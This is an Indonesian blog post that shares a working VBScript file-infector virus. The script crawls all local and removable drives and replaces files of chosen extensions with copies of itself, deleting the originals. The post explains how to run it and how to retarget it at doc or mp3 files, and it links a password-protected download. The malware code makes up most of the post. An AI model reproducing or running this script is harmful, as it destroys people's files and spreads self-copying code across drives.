Sabtu, 22 Oktober 2011

MENGERJAI JENIS FILE TERTENTU

Ini bagian dari virus yang bersifat destruktif(merusak), berbahaya dan merugikan, saya agak riskan men-sharenya.Selain saya tidak tahu secara pasti ( belum saya coba Sob, habis takut file-file saya rusak ).Lagipula saya tidak bisa menjelaskannya jadi saya cuma kasih scriptnya saja mau berfungsi atau tidak saya tidak mau menanggung resiko kehilangan file.Ini saya ambil dari potongan kode virus yang saya dapat dari buku dan saya modifikasi.
berikut scriptnya:
=========================================================================
on error resume next
set dendrif=CreateObject("Scripting.FileSystemObject")
set deo = dendrif.drives
for each drife in deo
if drife.drivetype=1 or drife.drivetype=2 then
dosearch (drife & "\")
end if
next
sub dosearch(path)
on error resume next
set dendrif=CreateObject("Scripting.FileSystemObject")
set folder = dendrif.getfolder(path)
set files = folder.files
for each file in files
if LCase(dendrif.GetExtensionName(file.path))="x1x" or LCase(dendrif.GetExtensionName(file.path))="x2x" then {satu baris sama if LCase(dendrif.GetExtensionName(file.path))="x1x"}
set cop=dendrif.getfile(wscript.scriptfullname)
cop.copy (file.path & ".vbs")  { aksi kejahatan disini }
dendrif.deletefile (file.path)     { aksi kejahatan disini }
end if
on error resume next
next
set subfolders=folder.subfolders
for each subfolder in subfolders
dosearch subfolder.path
next
end sub
========================================================================
simpan scrpt dengan nama infek.vbs
teks warna biru jangan diketik...ini hanya komentar saya saja
HATI - HATI JANGAN MEMASUKAN EXTENSI FILE YANG ADA DI PC, KARENA FILE YANG EXTENSIONNYA DIMASUKAN AKAN RUSAK ATAU DI HAPUS.....!
untuk membuktikannya, coba buka notepad ketikkan apa saja sesuka sobat blogger kemudian simpan dengan nama korban1.x1x ( ini berarti filenya berextensi x1x ), buka kembali notepad dan ketikkan lagi sesuka sobat blogger kemudian simpan dengan nama korban2.x1x.
Dan buka kembali notepad dan ketikkan lirik lagunya ayu ting ting, simpan dengan nama ayu.x2x.Buka lagi notepadnya ketikkan seenaknya biar tuh notepad diisi dengan tulisan yang aneh lalu simpan dengan nama korban3.x2x.Semua hasil dari notepad simpan difolder yang mudah dicari.jalankan script infek.vbs.Tunggu beberapa saat ( tergantung spek pc dan banyaknya file serta kapasitas HDD ).Tidak lama kemudian apa yang terjadi dengan keempat file tersebut?hanya sobat blogger yang tahu.
Kembali ke script saya TIDAK MENYARANKAN sobat blogger mengganti x1x atau x2x tapi sobat blogger bisa saja mengganti x1x atau x2x dengan doc atau mp3 kokasal jangan EXE karena bila sobat blogger menggantinya dengan exe sungguh TERLALUUUU berarti sobat blogger termasuk orang yang tidak berperikekomputeran.....?( maksud nya..? )

download script
password = www.dendrif-deo.co.cc[infekfile]
semoga bermanfaat......... :D

Tidak ada komentar:

Posting Komentar